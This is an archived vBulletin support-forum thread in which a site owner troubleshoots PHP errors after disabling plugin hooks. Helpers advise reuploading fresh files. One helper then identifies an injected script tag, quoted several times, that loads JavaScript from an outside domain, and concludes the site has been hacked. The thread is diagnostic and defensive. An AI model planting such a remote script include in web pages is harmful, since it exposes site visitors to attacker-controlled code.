Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #11  
Old 10-05-2014, 07:19 AM
cellarius's Avatar
cellarius cellarius is offline
 
Join Date: Aug 2005
Posts: 1,987
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Well, the file that triggers the error clearly is from an addon, namely a dbtech one, probably status and moods. This addon clearly is still executing plugin code, which it wouldn't if that line of code was present. Either you did not add it correctly or you did not add it to the correct file.
Reply With Quote
Благодарность от:
BlueCheri
  #12  
Old 10-05-2014, 07:32 AM
BlueCheri's Avatar
BlueCheri BlueCheri is offline
 
Join Date: Jul 2009
Posts: 339
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by cellarius View Post
Well, the file that triggers the error clearly is from an addon, namely a dbtech one, probably status and moods. This addon clearly is still executing plugin code, which it wouldn't if that line of code was present. Either you did not add it correctly or you did not add it to the correct file.
Thanx for your reply.

But now I can not login to admin cp and disable that mod, any other option to do it?

Note:

After using this code;


PHP Code:
define('DISABLE_HOOKS'true); 
I am getting following error;

PHP Code:
Warningsession_start() [function.session-start]: Cannot send session cookie headers already sent by (output started at ..../vb/vb.php:300in ..../includes/facebook/facebook.php on line 49

Warning
session_start() [function.session-start]: Cannot send session cache limiter headers already sent (output started at ..../vb/vb.php:300in ..../includes/facebook/facebook.php on line 49 
And for Admin CP following error;

PHP Code:
Parse errorsyntax errorunexpected T_VARIABLE in /home/offwalk/public_html/admincp/index.php on line 943 
Reply With Quote
  #13  
Old 10-05-2014, 03:59 PM
Lynne's Avatar
Lynne Lynne is offline
 
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

You should have both the lines in there:

PHP Code:
define('DISABLE_HOOKS'true); 
define('SKIP_DS_ERRORS'true); 
What error do you get with both of those lines added via notepad++?
Reply With Quote
  #14  
Old 10-06-2014, 04:44 AM
BlueCheri's Avatar
BlueCheri BlueCheri is offline
 
Join Date: Jul 2009
Posts: 339
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Lynne View Post
You should have both the lines in there:

PHP Code:
define('DISABLE_HOOKS'true); 
define('SKIP_DS_ERRORS'true); 
What error do you get with both of those lines added via notepad++?
Same error

PHP Code:
Warningsession_start() [function.session-start]: Cannot send session cookie headers already sent by (output started at ..../vb/vb.php:300in ..../includes/facebook/facebook.php on line 49

Warning
session_start() [function.session-start]: Cannot send session cache limiter headers already sent (output started at ..../vb/vb.php:300in ..../includes/facebook/facebook.php on line 49 
Reply With Quote
  #15  
Old 10-06-2014, 08:27 AM
cellarius's Avatar
cellarius cellarius is offline
 
Join Date: Aug 2005
Posts: 1,987
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Download a fresh package from the customer's area at vb.com and reupload your vB files. Leave the lines Lynne told you in your config.php.
Reply With Quote
Благодарность от:
BlueCheri
  #16  
Old 10-06-2014, 04:02 PM
Lynne's Avatar
Lynne Lynne is offline
 
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

What is this code at the top of your page?

HTML Code:
<script type="text/javascript" src="http://www.donaldmazza.com/ngffjrzg.php"></script><script type="text/javascript" src="http://www.donaldmazza.com/ngffjrzg.php"></script><br />
If you didn't put it there, then I think you've been hacked which means you should definitely do what Sven suggested and download a fresh set of files and upload them to the site and remove ALL files from your server that you didn't personally upload to the site.
Reply With Quote
Благодарность от:
BlueCheri
  #17  
Old 10-06-2014, 10:44 PM
Disco_Stu Disco_Stu is offline
 
Join Date: Apr 2012
Posts: 305
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Lynne View Post
What is this code at the top of your page?

HTML Code:
<script type="text/javascript" src="http://www.donaldmazza.com/ngffjrzg.php"></script><script type="text/javascript" src="http://www.donaldmazza.com/ngffjrzg.php"></script><br />
If you didn't put it there, then I think you've been hacked which means you should definitely do what Sven suggested and download a fresh set of files and upload them to the site and remove ALL files from your server that you didn't personally upload to the site.
If his site was hacked then there's the possibility that anyone visiting his site (including those that are trying to help him) may also now be hacked themselves.
Reply With Quote
  #18  
Old 10-07-2014, 11:07 PM
Lynne's Avatar
Lynne Lynne is offline
 
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Visiting a hacked site doesn't suddenly 'hack' your computer. I visit hacked sites quite often and I've never had my computer hacked because of it.
Reply With Quote
Благодарность от:
Max Taxable
  #19  
Old 10-08-2014, 12:01 AM
Disco_Stu Disco_Stu is offline
 
Join Date: Apr 2012
Posts: 305
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Lynne View Post
Visiting a hacked site doesn't suddenly 'hack' your computer. I visit hacked sites quite often and I've never had my computer hacked because of it.
I didn't say it would. I said there is the possibility. It's never a good idea to visit a site that may be compromised . Most viruses are designed to spread with each new visitor to the infected site.

Also, keep in mind that the best designed virus is the virus that infects your computer without you ever knowing about it. Sometimes people have a virus on their system for years before it's discovered. How do you think all the big box store hacking is taking place? Those viruses were present for a long time even when those companies had entire IT departments dedicated to protecting their systems.
Reply With Quote
  #20  
Old 10-08-2014, 10:58 AM
BlueCheri's Avatar
BlueCheri BlueCheri is offline
 
Join Date: Jul 2009
Posts: 339
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Ok, thanks.

Let try this.

Rgds

Quote:
Originally Posted by Lynne View Post
What is this code at the top of your page?

HTML Code:
<script type="text/javascript" src="http://www.donaldmazza.com/ngffjrzg.php"></script><script type="text/javascript" src="http://www.donaldmazza.com/ngffjrzg.php"></script><br />
If you didn't put it there, then I think you've been hacked which means you should definitely do what Sven suggested and download a fresh set of files and upload them to the site and remove ALL files from your server that you didn't personally upload to the site.
--------------- Added [DATE]1412775828[/DATE] at [TIME]1412775828[/TIME] ---------------

That works, many thanx

Rgds,


Quote:
Originally Posted by cellarius View Post
Download a fresh package from the customer's area at vb.com and reupload your vB files. Leave the lines Lynne told you in your config.php.
Quote:
Originally Posted by Lynne View Post
What is this code at the top of your page?

HTML Code:
<script type="text/javascript" src="http://www.donaldmazza.com/ngffjrzg.php"></script><script type="text/javascript" src="http://www.donaldmazza.com/ngffjrzg.php"></script><br />
If you didn't put it there, then I think you've been hacked which means you should definitely do what Sven suggested and download a fresh set of files and upload them to the site and remove ALL files from your server that you didn't personally upload to the site.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 07:35 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04459 seconds
  • Memory Usage 2,319KB
  • Queries Executed 14 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (4)bbcode_html
  • (6)bbcode_php
  • (7)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (3)pagenav_pagelink
  • (10)post_thanks_box
  • (4)post_thanks_box_bit
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (4)post_thanks_postbit
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete